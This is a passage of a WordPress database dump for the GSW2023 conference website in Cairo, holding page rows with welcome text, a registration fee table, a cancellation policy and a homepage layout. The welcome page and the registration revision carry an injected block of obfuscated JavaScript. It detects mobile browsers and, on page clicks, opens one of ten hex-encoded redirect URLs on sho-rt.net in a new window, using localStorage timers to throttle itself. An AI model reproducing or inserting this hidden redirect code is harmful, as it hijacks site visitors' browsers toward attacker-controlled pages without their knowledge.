u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','publish','closed','closed','','welcome','','','2023-06-03 11:05:21','2023-06-03 11:05:21','',0,'https://gsw2023.com/?page_id=3233',0,'page','',0),
(3235,1,'2022-11-09 21:14:35','2022-11-09 21:14:35','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h1 style=\"text-align: justify; color: red;\"><strong><span style=\"font-size: 22px;\">THE REGISTRATION FORM WILL Be OPEN Soon IN CONFTOOL</span></strong></h1>\r\n<div class=\"three_quarter first\"><section class=\"clear\">\r\n<h4>The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</h4>\r\n</section></div>\r\n[/bsf-info-box][ultimate_info_table color_scheme=\"blue\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td rowspan=\"2\"></td>\r\n<td colspan=\"3\"><strong>Standard</strong></td>\r\n<td colspan=\"3\"><strong>Student/Senior</strong></td>\r\n<td colspan=\"3\"><strong>Accompanying person</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n</tr>\r\n<tr>\r\n<td>1 Day</td>\r\n<td>$250</td>\r\n<td>$300</td>\r\n<td>$350</td>\r\n<td>$150</td>\r\n<td>$200</td>\r\n<td> $250</td>\r\n<td>$100</td>\r\n<td>$100</td>\r\n<td>$125</td>\r\n</tr>\r\n<tr>\r\n<td>2 Days</td>\r\n<td> $350</td>\r\n<td>$400</td>\r\n<td>$450</td>\r\n<td> $200</td>\r\n<td>$250</td>\r\n<td>$300</td>\r\n<td>$125</td>\r\n<td>$125</td>\r\n<td>$150</td>\r\n</tr>\r\n<tr>\r\n<td>3 Days</td>\r\n<td> $450</td>\r\n<td>$500</td>\r\n<td>$550</td>\r\n<td> $250</td>\r\n<td>$300</td>\r\n<td>$350</td>\r\n<td>$150</td>\r\n<td>$150</td>\r\n<td>$175</td>\r\n</tr>\r\n<tr>\r\n<td>4 Days</td>\r\n<td>$550</td>\r\n<td>$600</td>\r\n<td>$650</td>\r\n<td>$300</td>\r\n<td> $350</td>\r\n<td>$400</td>\r\n<td>$175</td>\r\n<td>$175</td>\r\n<td>$200</td>\r\n</tr>\r\n<tr>\r\n<td>5 Days</td>\r\n<td> $650</td>\r\n<td>$700</td>\r\n<td>$750</td>\r\n<td>$350</td>\r\n<td>$400</td>\r\n<td>$450</td>\r\n<td>$200</td>\r\n<td>$200</td>\r\n<td>$225</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/ultimate_info_table][bsf-info-box icon_size=\"32\"]\r\n<h2>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</h2>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: red;\">o Standard and student / senior (over 65) registration fees include:</h5>\r\n<ul class=\"nospace\">\r\n 	<li>\r\n<h6>Entry to all sessions/workshops;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Entry to the Exhibition;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Copy of Final Programme;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Morning and Afternoon Tea/Coffee breaks;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Lunches;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Welcome Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Exhibitors Reception;</h6>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: red;\">o Accompanying person fee includes:</h5>\r\n<ul>\r\n 	<li>\r\n<h6>Entry to Opening Session;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Welcome Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Exhibitors Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Morning and Afternoon Tea/Coffee breaks;</h6>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: red;\">o Cancellation policy:</h5>\r\n<ul>\r\n 	<li>\r\n<h6>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</h6>\r\n</li>\r\n</ul>\r\n<h5 style=\"text-align: justify; color: red;\">-Two Social Dinners Will Be Organized On Tuesday And Thursday.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','3233-revision-v1','','','2022-11-09 21:14:35','2022-11-09 21:14:35','',3233,'https://gsw2023.com/?p=3235',0,'revision','',0),
(3237,1,'2022-11-09 21:17:59','2022-11-09 21:17:59','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\r\n<h3></h3>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwellcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668028615691{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 